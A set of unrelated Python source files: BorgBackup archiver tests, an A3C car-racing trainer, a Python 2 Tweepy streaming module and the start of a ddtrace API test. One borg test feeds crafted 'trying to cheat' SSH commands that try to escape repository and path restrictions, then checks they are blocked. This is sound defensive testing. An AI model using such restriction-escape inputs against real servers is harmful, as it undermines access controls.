self.cmd('init', '--encryption=repokey', self.repository_location + '_3')
def test_remote_repo_restrict_to_repository(self):
# restricted to repo directory itself:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-repository', self.repository_path]):
self.cmd('init', '--encryption=repokey', self.repository_location)
parent_path = os.path.join(self.repository_path, '..')
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-repository', parent_path]):
with pytest.raises(PathNotAllowed):
self.cmd('init', '--encryption=repokey', self.repository_location)
@unittest.skip('only works locally')
def test_debug_put_get_delete_obj(self):
pass
@unittest.skip('only works locally')
def test_config(self):
pass
@unittest.skip('only works locally')
def test_migrate_lock_alive(self):
pass
def test_strip_components_doesnt_leak(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('dir/file', contents=b"test file contents 1")
self.create_regular_file('dir/file2', contents=b"test file contents 2")
self.create_regular_file('skipped-file1', contents=b"test file contents 3")
self.create_regular_file('skipped-file2', contents=b"test file contents 4")
self.create_regular_file('skipped-file3', contents=b"test file contents 5")
self.cmd('create', self.repository_location + '::test', 'input')
marker = 'cached responses left in RemoteRepository'
with changedir('output'):
res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '3')
self.assert_true(marker not in res)
with self.assert_creates_file('file'):
res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '2')
self.assert_true(marker not in res)
with self.assert_creates_file('dir/file'):
res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '1')
self.assert_true(marker not in res)
with self.assert_creates_file('input/dir/file'):
res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '0')
self.assert_true(marker not in res)
class ArchiverCorruptionTestCase(ArchiverTestCaseBase):
def setUp(self):
super().setUp()
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cache_path = json.loads(self.cmd('info', self.repository_location, '--json'))['cache']['path']
def corrupt(self, file, amount=1):
with open(file, 'r+b') as fd:
fd.seek(-amount, io.SEEK_END)
corrupted = bytes(255-c for c in fd.read(amount))
fd.seek(-amount, io.SEEK_END)
fd.write(corrupted)
def test_cache_chunks(self):
self.corrupt(os.path.join(self.cache_path, 'chunks'))
if self.FORK_DEFAULT:
out = self.cmd('info', self.repository_location, exit_code=2)
assert 'failed integrity check' in out
else:
with pytest.raises(FileIntegrityError):
self.cmd('info', self.repository_location)
def test_cache_files(self):
self.cmd('create', self.repository_location + '::test', 'input')
self.corrupt(os.path.join(self.cache_path, 'files'))
out = self.cmd('create', self.repository_location + '::test1', 'input')
# borg warns about the corrupt files cache, but then continues without files cache.
assert 'files cache is corrupted' in out
def test_chunks_archive(self):
self.cmd('create', self.repository_location + '::test1', 'input')
# Find ID of test1 so we can corrupt it later :)
target_id = self.cmd('list', self.repository_location, '--format={id}{LF}').strip()
self.cmd('create', self.repository_location + '::test2', 'input')
# Force cache sync, creating archive chunks of test1 and test2 in chunks.archive.d
self.cmd('delete', '--cache-only', self.repository_location)
self.cmd('info', self.repository_location, '--json')
chunks_archive = os.path.join(self.cache_path, 'chunks.archive.d')
assert len(os.listdir(chunks_archive)) == 4 # two archives, one chunks cache and one .integrity file each
self.corrupt(os.path.join(chunks_archive, target_id + '.compact'))
# Trigger cache sync by changing the manifest ID in the cache config
config_path = os.path.join(self.cache_path, 'config')
config = ConfigParser(interpolation=None)
config.read(config_path)
config.set('cache', 'manifest', bin_to_hex(bytes(32)))
with open(config_path, 'w') as fd:
config.write(fd)
# Cache sync notices corrupted archive chunks, but automatically recovers.
out = self.cmd('create', '-v', self.repository_location + '::test3', 'input', exit_code=1)
assert 'Reading cached archive chunk index for test1' in out
assert 'Cached archive chunk index of test1 is corrupted' in out
assert 'Fetching and building archive index for test1' in out
def test_old_version_interfered(self):
# Modify the main manifest ID without touching the manifest ID in the integrity section.
# This happens if a version without integrity checking modifies the cache.
config_path = os.path.join(self.cache_path, 'config')
config = ConfigParser(interpolation=None)
config.read(config_path)
config.set('cache', 'manifest', bin_to_hex(bytes(32)))
with open(config_path, 'w') as fd:
config.write(fd)
out = self.cmd('info', self.repository_location)
assert 'Cache integrity data not available: old Borg version modified the cache.' in out
class DiffArchiverTestCase(ArchiverTestCaseBase):
def test_basic_functionality(self):
# Setup files for the first snapshot
self.create_regular_file('empty', size=0)
self.create_regular_file('file_unchanged', size=128)
self.create_regular_file('file_removed', size=256)
self.create_regular_file('file_removed2', size=512)
self.create_regular_file('file_replaced', size=1024)
os.mkdir('input/dir_replaced_with_file')
os.chmod('input/dir_replaced_with_file', stat.S_IFDIR | 0o755)
os.mkdir('input/dir_removed')
if are_symlinks_supported():
os.mkdir('input/dir_replaced_with_link')
os.symlink('input/dir_replaced_with_file', 'input/link_changed')
os.symlink('input/file_unchanged', 'input/link_removed')
os.symlink('input/file_removed2', 'input/link_target_removed')
os.symlink('input/empty', 'input/link_target_contents_changed')
os.symlink('input/empty', 'input/link_replaced_by_file')
if are_hardlinks_supported():
os.link('input/file_replaced', 'input/hardlink_target_replaced')
os.link('input/empty', 'input/hardlink_contents_changed')
os.link('input/file_removed', 'input/hardlink_removed')
os.link('input/file_removed2', 'input/hardlink_target_removed')
self.cmd('init', '--encryption=repokey', self.repository_location)
# Create the first snapshot
self.cmd('create', self.repository_location + '::test0', 'input')
# Setup files for the second snapshot
self.create_regular_file('file_added', size=2048)
self.create_regular_file('file_empty_added', size=0)
os.unlink('input/file_replaced')
self.create_regular_file('file_replaced', contents=b'0' * 4096)
os.unlink('input/file_removed')
os.unlink('input/file_removed2')
os.rmdir('input/dir_replaced_with_file')
self.create_regular_file('dir_replaced_with_file', size=8192)
os.chmod('input/dir_replaced_with_file', stat.S_IFREG | 0o755)
os.mkdir('input/dir_added')
os.rmdir('input/dir_removed')
if are_symlinks_supported():
os.rmdir('input/dir_replaced_with_link')
os.symlink('input/dir_added', 'input/dir_replaced_with_link')
os.unlink('input/link_changed')
os.symlink('input/dir_added', 'input/link_changed')
os.symlink('input/dir_added', 'input/link_added')
os.unlink('input/link_replaced_by_file')
self.create_regular_file('link_replaced_by_file', size=16384)
os.unlink('input/link_removed')
if are_hardlinks_supported():
os.unlink('input/hardlink_removed')
os.link('input/file_added', 'input/hardlink_added')
with open('input/empty', 'ab') as fd:
fd.write(b'appended_data')
# Create the second snapshot
self.cmd('create', self.repository_location + '::test1a', 'input')
self.cmd('create', '--chunker-params', '16,18,17,4095', self.repository_location + '::test1b', 'input')
def do_asserts(output, can_compare_ids):
# File contents changed (deleted and replaced with a new file)
change = 'B' if can_compare_ids else '{:<19}'.format('modified')
assert 'file_replaced' in output # added to debug #3494
assert '{} input/file_replaced'.format(change) in output
# File unchanged
assert 'input/file_unchanged' not in output
# Directory replaced with a regular file
if 'BORG_TESTS_IGNORE_MODES' not in os.environ:
assert '[drwxr-xr-x -> -rwxr-xr-x] input/dir_replaced_with_file' in output
# Basic directory cases
assert 'added directory input/dir_added' in output
assert 'removed directory input/dir_removed' in output
if are_symlinks_supported():
# Basic symlink cases
assert 'changed link input/link_changed' in output
assert 'added link input/link_added' in output
assert 'removed link input/link_removed' in output
# Symlink replacing or being replaced
assert '] input/dir_replaced_with_link' in output
assert '] input/link_replaced_by_file' in output
# Symlink target removed. Should not affect the symlink at all.
assert 'input/link_target_removed' not in output
# The inode has two links and the file contents changed. Borg
# should notice the changes in both links. However, the symlink
# pointing to the file is not changed.
change = '0 B' if can_compare_ids else '{:<19}'.format('modified')
assert '{} input/empty'.format(change) in output
if are_hardlinks_supported():
assert '{} input/hardlink_contents_changed'.format(change) in output
if are_symlinks_supported():
assert 'input/link_target_contents_changed' not in output
# Added a new file and a hard link to it. Both links to the same
# inode should appear as separate files.
assert 'added 2.05 kB input/file_added' in output
if are_hardlinks_supported():
assert 'added 2.05 kB input/hardlink_added' in output
# check if a diff between non-existent and empty new file is found
assert 'added 0 B input/file_empty_added' in output
# The inode has two links and both of them are deleted. They should
# appear as two deleted files.
assert 'removed 256 B input/file_removed' in output
if are_hardlinks_supported():
assert 'removed 256 B input/hardlink_removed' in output
# Another link (marked previously as the source in borg) to the
# same inode was removed. This should not change this link at all.
if are_hardlinks_supported():
assert 'input/hardlink_target_removed' not in output
# Another link (marked previously as the source in borg) to the
# same inode was replaced with a new regular file. This should not
# change this link at all.
if are_hardlinks_supported():
assert 'input/hardlink_target_replaced' not in output
do_asserts(self.cmd('diff', self.repository_location + '::test0', 'test1a'), True)
# We expect exit_code=1 due to the chunker params warning
do_asserts(self.cmd('diff', self.repository_location + '::test0', 'test1b', exit_code=1), False)
def test_sort_option(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('a_file_removed', size=8)
self.create_regular_file('f_file_removed', size=16)
self.create_regular_file('c_file_changed', size=32)
self.create_regular_file('e_file_changed', size=64)
self.cmd('create', self.repository_location + '::test0', 'input')
os.unlink('input/a_file_removed')
os.unlink('input/f_file_removed')
os.unlink('input/c_file_changed')
os.unlink('input/e_file_changed')
self.create_regular_file('c_file_changed', size=512)
self.create_regular_file('e_file_changed', size=1024)
self.create_regular_file('b_file_added', size=128)
self.create_regular_file('d_file_added', size=256)
self.cmd('create', self.repository_location + '::test1', 'input')
output = self.cmd('diff', '--sort', self.repository_location + '::test0', 'test1')
expected = [
'a_file_removed',
'b_file_added',
'c_file_changed',
'd_file_added',
'e_file_changed',
'f_file_removed',
]
assert all(x in line for x, line in zip(expected, output.splitlines()))
def test_get_args():
archiver = Archiver()
# everything normal:
# first param is argv as produced by ssh forced command,
# second param is like from SSH_ORIGINAL_COMMAND env variable
args = archiver.get_args(['borg', 'serve', '--umask=0027', '--restrict-to-path=/p1', '--restrict-to-path=/p2', ],
'borg serve --info')
assert args.func == archiver.do_serve
assert args.restrict_to_paths == ['/p1', '/p2']
assert args.umask == 0o027
assert args.log_level == 'info'
# similar, but with --restrict-to-repository
args = archiver.get_args(['borg', 'serve', '--restrict-to-repository=/r1', '--restrict-to-repository=/r2', ],
'borg serve --info --umask=0027')
assert args.restrict_to_repositories == ['/r1', '/r2']
# trying to cheat - break out of path restriction
args = archiver.get_args(['borg', 'serve', '--restrict-to-path=/p1', '--restrict-to-path=/p2', ],
'borg serve --restrict-to-path=/')
assert args.restrict_to_paths == ['/p1', '/p2']
# trying to cheat - break out of repository restriction
args = archiver.get_args(['borg', 'serve', '--restrict-to-repository=/r1', '--restrict-to-repository=/r2', ],
'borg serve --restrict-to-repository=/')
assert args.restrict_to_repositories == ['/r1', '/r2']
# trying to cheat - break below repository restriction
args = archiver.get_args(['borg', 'serve', '--restrict-to-repository=/r1', '--restrict-to-repository=/r2', ],
'borg serve --restrict-to-repository=/r1/below')
assert args.restrict_to_repositories == ['/r1', '/r2']
# trying to cheat - try to execute different subcommand
args = archiver.get_args(['borg', 'serve', '--restrict-to-path=/p1', '--restrict-to-path=/p2', ],
'borg init --encryption=repokey /')
assert args.func == archiver.do_serve
# Check that environment variables in the forced command don't cause issues. If the command
# were not forced, environment variables would be interpreted by the shell, but this does not
# happen for forced commands - we get the verbatim command line and need to deal with env vars.
args = archiver.get_args(['borg', 'serve', ],
'BORG_FOO=bar borg serve --info')
assert args.func == archiver.do_serve
def test_chunk_content_equal():
def ccc(a, b):
chunks_a = [data for data in a]
chunks_b = [data for data in b]
compare1 = ItemDiff._chunk_content_equal(iter(chunks_a), iter(chunks_b))
compare2 = ItemDiff._chunk_content_equal(iter(chunks_b), iter(chunks_a))
assert compare1 == compare2
return compare1
assert ccc([
b'1234', b'567A', b'bC'
], [
b'1', b'23', b'4567A', b'b', b'C'
])
# one iterator exhausted before the other
assert not ccc([
b'12345',
], [
b'1234', b'56'
])
# content mismatch
assert not ccc([
b'1234', b'65'
], [
b'1234', b'56'
])
# first is the prefix of second
assert not ccc([
b'1234', b'56'
], [
b'1234', b'565'
])
class TestBuildFilter:
@staticmethod
def peek_and_store_hardlink_masters(item, matched):
pass
def test_basic(self):
matcher = PatternMatcher()
matcher.add([parse_pattern('included')], IECommand.Include)
filter = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, 0)
assert filter(Item(path='included'))
assert filter(Item(path='included/file'))
assert not filter(Item(path='something else'))
def test_empty(self):
matcher = PatternMatcher(fallback=True)
filter = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, 0)
assert filter(Item(path='anything'))
def test_strip_components(self):
matcher = PatternMatcher(fallback=True)
filter = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, strip_components=1)
assert not filter(Item(path='shallow'))
assert not filter(Item(path='shallow/')) # can this even happen? paths are normalized...
assert filter(Item(path='deep enough/file'))
assert filter(Item(path='something/dir/file'))
class TestCommonOptions:
@staticmethod
def define_common_options(add_common_option):
add_common_option('-h', '--help', action='help', help='show this help message and exit')
add_common_option('--critical', dest='log_level', help='foo',
action='store_const', const='critical', default='warning')
add_common_option('--error', dest='log_level', help='foo',
action='store_const', const='error', default='warning')
add_common_option('--append', dest='append', help='foo',
action='append', metavar='TOPIC', default=[])
add_common_option('-p', '--progress', dest='progress', action='store_true', help='foo')
add_common_option('--lock-wait', dest='lock_wait', type=int, metavar='N', default=1,
help='(default: %(default)d).')
@pytest.fixture
def basic_parser(self):
parser = argparse.ArgumentParser(prog='test', description='test parser', add_help=False)
parser.common_options = Archiver.CommonOptions(self.define_common_options,
suffix_precedence=('_level0', '_level1'))
return parser
@pytest.fixture
def subparsers(self, basic_parser):
if sys.version_info >= (3, 7):
# py37 pre-release defaults to unwanted required=True, in 3.7.0+ it was fixed to =False
return basic_parser.add_subparsers(title='required arguments', metavar='<command>', required=False)
else:
# py36 does not support required=... argument (but behaves like required=False).
# note: use below call for 3.6 and 3.7 when there are no alphas/betas/RCs of 3.7.0 around any more.
return basic_parser.add_subparsers(title='required arguments', metavar='<command>')
@pytest.fixture
def parser(self, basic_parser):
basic_parser.common_options.add_common_group(basic_parser, '_level0', provide_defaults=True)
return basic_parser
@pytest.fixture
def common_parser(self, parser):
common_parser = argparse.ArgumentParser(add_help=False, prog='test')
parser.common_options.add_common_group(common_parser, '_level1')
return common_parser
@pytest.fixture
def parse_vars_from_line(self, parser, subparsers, common_parser):
subparser = subparsers.add_parser('subcommand', parents=[common_parser], add_help=False,
description='foo', epilog='bar', help='baz',
formatter_class=argparse.RawDescriptionHelpFormatter)
subparser.set_defaults(func=1234)
subparser.add_argument('--append-only', dest='append_only', action='store_true')
def parse_vars_from_line(*line):
print(line)
args = parser.parse_args(line)
parser.common_options.resolve(args)
return vars(args)
return parse_vars_from_line
def test_simple(self, parse_vars_from_line):
assert parse_vars_from_line('--error') == {
'append': [],
'lock_wait': 1,
'log_level': 'error',
'progress': False
}
assert parse_vars_from_line('--error', 'subcommand', '--critical') == {
'append': [],
'lock_wait': 1,
'log_level': 'critical',
'progress': False,
'append_only': False,
'func': 1234,
}
with pytest.raises(SystemExit):
parse_vars_from_line('--append-only', 'subcommand')
assert parse_vars_from_line('--append=foo', '--append', 'bar', 'subcommand', '--append', 'baz') == {
'append': ['foo', 'bar', 'baz'],
'lock_wait': 1,
'log_level': 'warning',
'progress': False,
'append_only': False,
'func': 1234,
}
@pytest.mark.parametrize('position', ('before', 'after', 'both'))
@pytest.mark.parametrize('flag,args_key,args_value', (
('-p', 'progress', True),
('--lock-wait=3', 'lock_wait', 3),
))
def test_flag_position_independence(self, parse_vars_from_line, position, flag, args_key, args_value):
line = []
if position in ('before', 'both'):
line.append(flag)
line.append('subcommand')
if position in ('after', 'both'):
line.append(flag)
result = {
'append': [],
'lock_wait': 1,
'log_level': 'warning',
'progress': False,
'append_only': False,
'func': 1234,
}
result[args_key] = args_value
assert parse_vars_from_line(*line) == result
def test_parse_storage_quota():
assert parse_storage_quota('50M') == 50 * 1000**2
with pytest.raises(argparse.ArgumentTypeError):
parse_storage_quota('5M')
def get_all_parsers():
"""
Return dict mapping command to parser.
"""
parser = Archiver(prog='borg').build_parser()
borgfs_parser = Archiver(prog='borgfs').build_parser()
parsers = {}
def discover_level(prefix, parser, Archiver, extra_choices=None):
choices = {}
for action in parser._actions:
if action.choices is not None and 'SubParsersAction' in str(action.__class__):
for cmd, parser in action.choices.items():
choices[prefix + cmd] = parser
if extra_choices is not None:
choices.update(extra_choices)
if prefix and not choices:
return
for command, parser in sorted(choices.items()):
discover_level(command + " ", parser, Archiver)
parsers[command] = parser
discover_level("", parser, Archiver, {'borgfs': borgfs_parser})
return parsers
@pytest.mark.parametrize('command, parser', list(get_all_parsers().items()))
def test_help_formatting(command, parser):
if isinstance(parser.epilog, RstToTextLazy):
assert parser.epilog.rst
@pytest.mark.parametrize('topic, helptext', list(Archiver.helptext.items()))
def test_help_formatting_helptexts(topic, helptext):
assert str(rst_to_terminal(helptext))
|
trainer.py
|
class Trainer:
def __init__(self, gamma, agent, window = 15, workers = 8, **kwargs):
super().__init__(**kwargs)
self.agent = agent
self.window = window
self.gamma = gamma
self.optimizer = optim.Adam(self.agent.parameters(), lr=1e-4)
self.workers = workers
# even though we're loading the weights into worker agents explicitly, I found that still without sharing the weights as following, the algorithm was not converging:
self.agent.share_memory()
def fit(self, episodes = 1000):
"""
The higher level method for training the agents.
It called into the lower level "train" which orchestrates the process itself.
"""
last_update = 0
updates = dict()
for ix in range(1, self.workers + 1):
updates[ ix ] = { 'episode': 0, 'step': 0, 'rewards': deque(), 'losses': deque(), 'points': 0, 'mean_reward': 0, 'mean_loss': 0 }
for update in self.train(episodes):
now = time.time()
# you could do something useful here with the updates dict.
# I've opted out as I'm using logging anyways and got more value in just watching the log file, grepping for the desired values
# save the current model's weights every minute:
if now - last_update > 60:
torch.save(self.agent.state_dict(), './checkpoints/car-racing/' + str(int(now)) + '-.pytorch')
last_update = now
def train(self, episodes = 1000):
"""
Lower level training orchestration method. Written in the generator style. Intended to be used with "for update in train(...):"
"""
# create the requested number of background agents and runners:
worker_agents = self.agent.clone(num = self.workers)
runners = [ Runner(agent=agent, ix = ix + 1, train = True) for ix, agent in enumerate(worker_agents) ]
# we're going to communicate the workers' updates via the thread safe queue:
queue = mp.SimpleQueue()
# if we've not been given a number of episodes: assume the process is going to be interrupted with the keyboard interrupt once the user (us) decides so:
if episodes is None:
print('Starting out an infinite training process')
# create the actual background processes, making their entry be the train_one method:
processes = [ mp.Process(target=self.train_one, args=(runners[ix - 1], queue, episodes, ix)) for ix in range(1, self.workers + 1) ]
# run those processes:
for process in processes:
process.start()
try:
# what follows is a rather naive implementation of listening to workers updates. it works though for our purposes:
while any([ process.is_alive() for process in processes ]):
results = queue.get()
yield results
except Exception as e:
logger.error(str(e))
def train_one(self, runner, queue, episodes = 1000, ix = 1):
"""
Orchestrate the training for a single worker runner and agent. This is intended to run in its own background process.
"""
# possibly naive way of trying to de-correlate the weight updates further (I have no hard evidence to prove if it works, other than my subjective observation):
time.sleep(ix)
try:
# we are going to request the episode be reset whenever our agent scores lower than its max points. the same will happen if the agent scores total of -10 points:
max_points = 0
max_eval_points = 0
min_points = 0
max_episode = 0
for episode_ix in itertools.count(start=0, step=1):
if episodes is not None and episode_ix >= episodes:
return
max_episode_points = 0
points = 0
# load up the newest weights every new episode:
runner.load_state_dict(self.agent.state_dict())
# every 5 episodes lets evaluate the weights we've learned so far by recording the run of the car using the greedy strategy:
if ix == 1 and episode_ix % 5 == 0:
eval_points = self.record_greedy(episode_ix)
if eval_points > max_eval_points:
torch.save(runner.agent.state_dict(), './checkpoints/car-racing/' + str(eval_points) + '-eval-points.pytorch')
max_eval_points = eval_points
# each n-step window, compute the gradients and apply
# also: decide if we shouldn't restart the episode if we don't want to explore too much of the not-useful state space:
for step, rewards, values, policies, action_ixs, terminal in runner.run_episode(yield_every=self.window):
points += sum(rewards)
if ix == 1 and points > max_points:
torch.save(runner.agent.state_dict(), './checkpoints/car-racing/' + str(points) + '-points.pytorch')
max_points = points
if ix == 1 and episode_ix > max_episode:
torch.save(runner.agent.state_dict(), './checkpoints/car-racing/' + str(episode_ix) + '-episode.pytorch')
max_episode = episode_ix
if points < -10 or (max_episode_points > min_points and points < min_points):
terminal = True
max_episode_points = 0
point = 0
runner.ask_reset()
if terminal:
logger.info('TERMINAL for ' + str(ix) + ' at step ' + str(step) + ' with total points ' + str(points) + ' max: ' + str(max_episode_points) )
# if we're learning, then compute and apply the gradients and load the newest weights:
if runner.train:
loss = self.apply_gradients(policies, action_ixs, rewards, values, terminal, runner)
runner.load_state_dict(self.agent.state_dict())
max_episode_points = max(max_episode_points, points)
min_points = max(min_points, points)
# communicate the gathered values to the main process:
queue.put((ix, episode_ix, step, rewards, loss, points, terminal))
except Exception as e:
string = traceback.format_exc()
logger.error(str(e) + ' → ' + string)
queue.put((ix, -1, -1, [-1], -1, str(e) + '<br />' + string, True))
def record_greedy(self, episode_ix):
"""
Records the video of the "greedy" run based on the current weights.
"""
directory = './videos/car-racing/episode-' + str(episode_ix) + '-' + str(int(time.time()))
player = Player(agent=self.agent, directory=directory, train=False)
points = player.play()
logger.info('Evaluation at episode ' + str(episode_ix) + ': ' + str(points) + ' points (' + directory + ')')
return points
def apply_gradients(self, policies, actions, rewards, values, terminal, runner):
worker_agent = runner.agent
actions_one_hot = torch.tensor([[ int(i == action) for i in range(4) ] for action in actions], dtype=torch.float32)
policies = torch.stack(policies)
values = torch.cat(values)
values_nograd = torch.zeros_like(values.detach(), requires_grad=False)
values_nograd.copy_(values)
discounted_rewards = self.discount_rewards(runner, rewards, values_nograd[-1], terminal)
advantages = discounted_rewards - values_nograd
logger.info('Runner ' + str(runner.ix) + 'Rewards: ' + str(rewards))
logger.info('Runner ' + str(runner.ix) + 'Discounted Rewards: ' + str(discounted_rewards.numpy()))
log_policies = torch.log(0.00000001 + policies)
one_log_policies = torch.sum(log_policies * actions_one_hot, dim=1)
entropy = torch.sum(policies * -log_policies)
policy_loss = -torch.mean(one_log_policies * advantages)
value_loss = F.mse_loss(values, discounted_rewards)
value_loss_nograd = torch.zeros_like(value_loss)
value_loss_nograd.copy_(value_loss)
policy_loss_nograd = torch.zeros_like(policy_loss)
policy_loss_nograd.copy_(policy_loss)
logger.info('Value Loss: ' + str(float(value_loss_nograd)) + ' Policy Loss: ' + str(float(policy_loss_nograd)))
loss = policy_loss + 0.5 * value_loss - 0.01 * entropy
self.agent.zero_grad()
loss.backward()
torch.nn.utils.clip_grad_norm_(worker_agent.parameters(), 40)
# the following step is crucial. at this point, all the info about the gradients reside in the worker agent's memory. We need to "move" those gradients into the main agent's memory:
self.share_gradients(worker_agent)
# update the weights with the computed gradients:
self.optimizer.step()
worker_agent.zero_grad()
return float(loss.detach())
def share_gradients(self, worker_agent):
for param, shared_param in zip(worker_agent.parameters(), self.agent.parameters()):
if shared_param.grad is not None:
return
shared_param._grad = param.grad
def clip_reward(self, reward):
"""
Clips the rewards into the <-3, 3> range preventing too big of the gradients variance.
"""
return max(min(reward, 3), -3)
def discount_rewards(self, runner, rewards, last_value, terminal):
discounted_rewards = [0 for _ in rewards]
loop_rewards = [ self.clip_reward(reward) for reward in rewards ]
if terminal:
loop_rewards.append(0)
else:
loop_rewards.append(runner.get_value())
for main_ix in range(len(discounted_rewards) - 1, -1, -1):
for inside_ix in range(len(loop_rewards) - 1, -1, -1):
if inside_ix >= main_ix:
reward = loop_rewards[inside_ix]
discounted_rewards[main_ix] += self.gamma**(inside_ix - main_ix) * reward
return torch.tensor(discounted_rewards)
class Player(Runner):
def __init__(self, directory, **kwargs):
super().__init__(ix=999, **kwargs)
self.env = Monitor(self.env, directory)
def play(self):
points = 0
for step, rewards, values, policies, actions, terminal in self.run_episode(yield_every = 1, do_render = True):
points += sum(rewards)
self.env.close()
return points
if __name__ == "__main__":
agent = Agent()
trainer = Trainer(gamma = 0.99, agent = agent)
trainer.fit(episodes=None)
|
streaming.py
|
# Tweepy
# Copyright 2009-2010 Joshua Roesslein
# See LICENSE for details.
import httplib
from socket import timeout
from threading import Thread
from time import sleep
import urllib
import zlib
from tweepy import __version__
from tweepy.models import Status
from tweepy.api import API
from tweepy.error import TweepError
from tweepy.utils import import_simplejson
json = import_simplejson()
STREAM_VERSION = 1
class StreamListener(object):
def __init__(self, api=None):
self.api = api or API()
def on_data(self, data):
"""Called when raw data is received from connection.
Override this method if you wish to manually handle
the stream data. Return False to stop stream and close connection.
"""
if 'in_reply_to_status_id' in data:
status = Status.parse(self.api, json.loads(data))
if self.on_status(status) is False:
return False
elif 'delete' in data:
delete = json.loads(data)['delete']['status']
if self.on_delete(delete['id'], delete['user_id']) is False:
return False
elif 'limit' in data:
if self.on_limit(json.loads(data)['limit']['track']) is False:
return False
def on_status(self, status):
"""Called when a new status arrives"""
return
def on_delete(self, status_id, user_id):
"""Called when a delete notice arrives for a status"""
return
def on_limit(self, track):
"""Called when a limitation notice arrvies"""
return
def on_error(self, status_code):
"""Called when a non-200 status code is returned"""
return False
def on_timeout(self):
"""Called when stream connection times out"""
return
class Stream(object):
host = 'stream.twitter.com'
def __init__(self, auth, listener, **options):
self.auth = auth
self.listener = listener
self.running = False
self.timeout = options.get("timeout", 300.0)
self.retry_count = options.get("retry_count")
self.retry_time = options.get("retry_time", 10.0)
self.snooze_time = options.get("snooze_time", 5.0)
self.buffer_size = options.get("buffer_size", 1500)
self.use_gzip = options.get("gzip", False)
if options.get("secure", True):
self.scheme = "https"
else:
self.scheme = "http"
self.api = API()
self.headers = options.get("headers") or {}
if self.use_gzip:
self.headers['Accept-Encoding'] = 'deflate, gzip'
self.headers['User-Agent'] = 'Tweepy v%s' % __version__
self.parameters = None
self.body = None
def _run(self):
# Authenticate
url = "%s://%s%s" % (self.scheme, self.host, self.url)
# Connect and process the stream
error_counter = 0
conn = None
exception = None
while self.running:
if self.retry_count is not None and error_counter > self.retry_count:
# quit if error count greater than retry count
break
try:
if self.scheme == "http":
conn = httplib.HTTPConnection(self.host)
else:
conn = httplib.HTTPSConnection(self.host)
self.auth.apply_auth(url, 'POST', self.headers, self.parameters)
conn.connect()
conn.sock.settimeout(self.timeout)
conn.request('POST', self.url, self.body, headers=self.headers)
resp = conn.getresponse()
if resp.status != 200:
if self.listener.on_error(resp.status) is False:
break
error_counter += 1
sleep(self.retry_time)
else:
error_counter = 0
if self.use_gzip:
self._read_gzip_loop(resp)
else:
self._read_loop(resp)
except timeout:
if self.listener.on_timeout() == False:
break
if self.running is False:
break
conn.close()
sleep(self.snooze_time)
except Exception, exception:
# any other exception is fatal, so kill loop
break
# cleanup
self.running = False
if conn:
conn.close()
if exception:
raise
def _read_gzip_loop(self, resp):
decompressor = zlib.decompressobj(16 + zlib.MAX_WBITS)
data = ''
lines = []
while self.running:
if resp.isclosed():
break
buf = decompressor.decompress(resp.read(self.buffer_size))
for c in buf:
if c == '\n':
lines.append(data.strip())
data = ''
else:
data += c
if len(lines) > 0:
for line in lines:
if self.listener.on_data(line) is False:
self.running = False
del lines[:]
def _read_loop(self, resp):
while self.running:
if resp.isclosed():
break
# read length
data = ''
while True:
c = resp.read(1)
if not c or c == '\n':
break
data += c
data = data.strip()
# read data and pass into listener
if self.listener.on_data(data) is False:
self.running = False
def _start(self, async):
self.running = True
if async:
Thread(target=self._run).start()
else:
self._run()
def userstream(self, count=None, async=False, secure=True):
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/2/user.json'
self.host='userstream.twitter.com'
if count:
self.url += '&count=%s' % count
self._start(async)
def firehose(self, count=None, async=False):
self.parameters = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%i/statuses/firehose.json?delimited=length' % STREAM_VERSION
if count:
self.url += '&count=%s' % count
self._start(async)
def retweet(self, async=False):
self.parameters = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%i/statuses/retweet.json?delimited=length' % STREAM_VERSION
self._start(async)
def sample(self, count=None, async=False):
self.parameters = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%i/statuses/sample.json?delimited=length' % STREAM_VERSION
if count:
self.url += '&count=%s' % count
self._start(async)
def filter(self, follow=None, track=None, async=False, locations=None, count = None):
self.parameters = {}
self.headers['Content-type'] = "application/x-www-form-urlencoded"
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%i/statuses/filter.json?delimited=length' % STREAM_VERSION
if follow:
self.parameters['follow'] = ','.join(map(str, follow))
if track:
self.parameters['track'] = ','.join(map(str, track))
if locations and len(locations) > 0:
assert len(locations) % 4 == 0
self.parameters['locations'] = ','.join(['%.2f' % l for l in locations])
if count:
self.parameters['count'] = count
self.body = urllib.urlencode(self.parameters)
self.parameters['delimited'] = 'length'
self._start(async)
def disconnect(self):
if self.running is False:
return
self.running = False
|
test_api.py
|
import mock
import re
import socket
import threading
import time
import warnings
from unittest import TestCase
import pytest
from ddtrace.api import API, Response
from ddtrace.compat import iteritems, httplib, PY3
from ddtrace.internal.runtime.container import CGroupInfo
from ddtrace.vendor.six.moves import BaseHTTPServer, socketserver
class _BaseHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
error_message_format = '%(message)s\n'
error_content_type = 'text/plain'
@staticmethod
def log_message(format, *args): # noqa: A002
pass
class _APIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
def do_PUT(self):
self.send_error(200, 'OK')
class _TimeoutAPIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
def do_PUT(self):
# This server sleeps longer than our timeout
time.sleep(5)
class _ResetAPIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
def do_PUT(self):
return
_HOST = '0.0.0.0'
_TIMEOUT_PORT = 8743
_RESET_PORT = _TIMEOUT_PORT + 1
class UDSHTTPServer(socketserver.UnixStreamServer, BaseHTTPServer.HTTPServer):
def server_bind(self):
BaseHTTPServer.HTTPServer.server_bind(self)
def _make_uds_server(path, request_handler):
server = UDSHTTPServer(path, request_handler)
